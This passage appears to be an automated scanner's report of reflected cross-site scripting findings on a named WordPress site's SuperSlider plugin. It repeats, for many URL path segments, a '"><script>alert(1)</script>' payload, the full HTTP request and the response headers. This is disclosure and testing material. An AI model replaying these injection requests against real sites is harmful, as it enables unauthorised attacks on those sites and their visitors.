X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674582+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674582; expires=Thu, 02-Feb-2012 19:23:02 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:02 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9979"><script>alert(1)</script>228c627681f was submitted in the REST URL parameter 4. This input was echoed as a9979\"><script>alert(1)</script>228c627681f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincata9979"><script>alert(1)</script>228c627681f/js/mootools-1.2.3.1-more.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 928f1"><script>alert(1)</script>1c33f9cbad5 was submitted in the REST URL parameter 5. This input was echoed as 928f1\"><script>alert(1)</script>1c33f9cbad5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/js928f1"><script>alert(1)</script>1c33f9cbad5/mootools-1.2.3.1-more.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674585+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3aba1"><script>alert(1)</script>0cbb2f96b6 was submitted in the REST URL parameter 6. This input was echoed as 3aba1\"><script>alert(1)</script>0cbb2f96b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js3aba1"><script>alert(1)</script>0cbb2f96b6 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:06 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674586; expires=Thu, 02-Feb-2012 19:23:06 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:06 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f91c"><script>alert(1)</script>89e1dc2587 was submitted in the REST URL parameter 1. This input was echoed as 6f91c\"><script>alert(1)</script>89e1dc2587 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site6f91c"><script>alert(1)</script>89e1dc2587/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674574+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674574; expires=Thu, 02-Feb-2012 19:22:54 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 246ce"><script>alert(1)</script>c071be92443 was submitted in the REST URL parameter 2. This input was echoed as 246ce\"><script>alert(1)</script>c071be92443 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content246ce"><script>alert(1)</script>c071be92443/plugins/superslider-postsincat/js/slideBox-v1.0.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:58 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674578+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674578; expires=Thu, 02-Feb-2012 19:22:58 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34091"><script>alert(1)</script>09174c8f3b0 was submitted in the REST URL parameter 3. This input was echoed as 34091\"><script>alert(1)</script>09174c8f3b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins34091"><script>alert(1)</script>09174c8f3b0/superslider-postsincat/js/slideBox-v1.0.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674580+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674580; expires=Thu, 02-Feb-2012 19:23:00 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7da63"><script>alert(1)</script>ef4ebc3ad8b was submitted in the REST URL parameter 4. This input was echoed as 7da63\"><script>alert(1)</script>ef4ebc3ad8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat7da63"><script>alert(1)</script>ef4ebc3ad8b/js/slideBox-v1.0.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:02 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674582+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a778"><script>alert(1)</script>914349c7fa1 was submitted in the REST URL parameter 5. This input was echoed as 3a778\"><script>alert(1)</script>914349c7fa1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/js3a778"><script>alert(1)</script>914349c7fa1/slideBox-v1.0.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674584+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674584; expires=Thu, 02-Feb-2012 19:23:04 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1dfd"><script>alert(1)</script>f981ff2d39 was submitted in the REST URL parameter 6. This input was echoed as e1dfd\"><script>alert(1)</script>f981ff2d39 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.jse1dfd"><script>alert(1)</script>f981ff2d39 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674586; expires=Thu, 02-Feb-2012 19:23:06 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:06 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3acc0"><script>alert(1)</script>5fc51608de0 was submitted in the REST URL parameter 1. This input was echoed as 3acc0\"><script>alert(1)</script>5fc51608de0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site3acc0"><script>alert(1)</script>5fc51608de0/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674581+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674581; expires=Thu, 02-Feb-2012 19:23:01 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:01 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 574e5"><script>alert(1)</script>2452676616d was submitted in the REST URL parameter 2. This input was echoed as 574e5\"><script>alert(1)</script>2452676616d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content574e5"><script>alert(1)</script>2452676616d/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:02 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f714"><script>alert(1)</script>39a0a2ffe53 was submitted in the REST URL parameter 3. This input was echoed as 2f714\"><script>alert(1)</script>39a0a2ffe53 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins2f714"><script>alert(1)</script>39a0a2ffe53/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674585+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fda27"><script>alert(1)</script>618a4ef6632 was submitted in the REST URL parameter 4. This input was echoed as fda27\"><script>alert(1)</script>618a4ef6632 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincatfda27"><script>alert(1)</script>618a4ef6632/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:06 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad888"><script>alert(1)</script>85bc6e4dd3f was submitted in the REST URL parameter 5. This input was echoed as ad888\"><script>alert(1)</script>85bc6e4dd3f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/plugin-dataad888"><script>alert(1)</script>85bc6e4dd3f/superslider/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:08 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674588; expires=Thu, 02-Feb-2012 19:23:08 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
